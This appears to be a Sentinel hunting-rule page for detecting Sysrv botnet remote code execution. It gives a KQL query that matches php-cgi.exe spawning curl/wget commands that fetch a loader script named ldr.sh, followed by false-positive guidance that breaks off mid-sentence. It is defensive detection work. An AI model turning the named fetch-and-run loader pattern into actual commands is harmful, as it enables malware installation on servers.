rce-on-vulnerable-server

Hunt Hypothesis

Adversaries may exploit known vulnerabilities on Linux servers to execute remote code and deploy mining malware as part of a botnet. SOC teams should proactively hunt for this behavior in Azure Sentinel to detect and mitigate Sysrv botnet activity before it leads to resource exhaustion and cryptocurrency mining operations.

KQL Query

DeviceProcessEvents
| where InitiatingProcessCommandLine has "php-cgi.exe"
| where ProcessCommandLine has_all ('curl -fsSL', '/ldr.sh', 'wget -q -O')

Analytic Rule Definition

id: ec7ec6bb-c15a-4d2b-9682-a92bf5a22c8e
name: rce-on-vulnerable-server
description: |
  This query was originally published in the threat analytics report, Sysrv botnet evolution.
  Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptocurrency.
  The following query finds instances of remote code execution on a vulnerable Linux server.
requiredDataConnectors:
- connectorId: MicrosoftThreatProtection
  dataTypes:
  - DeviceProcessEvents
query: |
  DeviceProcessEvents
  | where InitiatingProcessCommandLine has "php-cgi.exe"
  | where ProcessCommandLine has_all ('curl -fsSL', '/ldr.sh', 'wget -q -O')

Required Data Sources

Sentinel Table	Notes
`DeviceProcessEvents`	Ensure this data connector is enabled

References

[Source Query](https://github.com/Azure/Azure-Sentinel/blob/main/Hunting Queries/Microsoft 365 Defender/Campaigns/Sysrv-botnet/rce-on-vulnerable-server.yaml)

False Positive Guidance

Scenario: Scheduled System Maintenance Task
Description: A legitimate system maintenance task, such as a nightly disk cleanup or log rotation, is executed on a Linux server using cron. This task may involve executing scripts or binaries that resemble malicious behavior.
Filter/Exclusion: Exclude processes initiated by cron or tasks with known maintenance scripts (e.g., /usr/sbin/logrotate, /etc/cron.daily/).
Scenario: Admin Performing Remote Code Execution for Patching
Description: An administrator uses a legitimate remote management tool like Ansible or SaltStack to execute a patching script on a vulnerable server. The script may involve executing commands that match the detection logic.
Filter/Exclusion: Exclude processes initiated by ansible-playbook or salt-cmd with known patching playbooks.
Scenario: Automated Security Scan Using Nessus or OpenVAS
Description: A security scan tool like Nessus or OpenVAS is running a vulnerability assessment on a server, which may involve executing scripts or commands that trigger the rule.
Filter/Exclusion: Exclude processes with parent process names like nessusd, openvas, or nmap and filter by known scan scripts.
Scenario: Legitimate Remote Debugging Session
Description: A developer uses a remote debugging tool like gdb or strace to debug a service running on a server. The tool may execute commands that match the rule’s detection logic.
Filter/Exclusion: Exclude processes with parent process names like gdb, strace, or gdbserver and filter by known debugging scripts.
Scenario: Cron Job for System Monitoring with sar or iostat
Description: A cron job runs system monitoring tools like sar or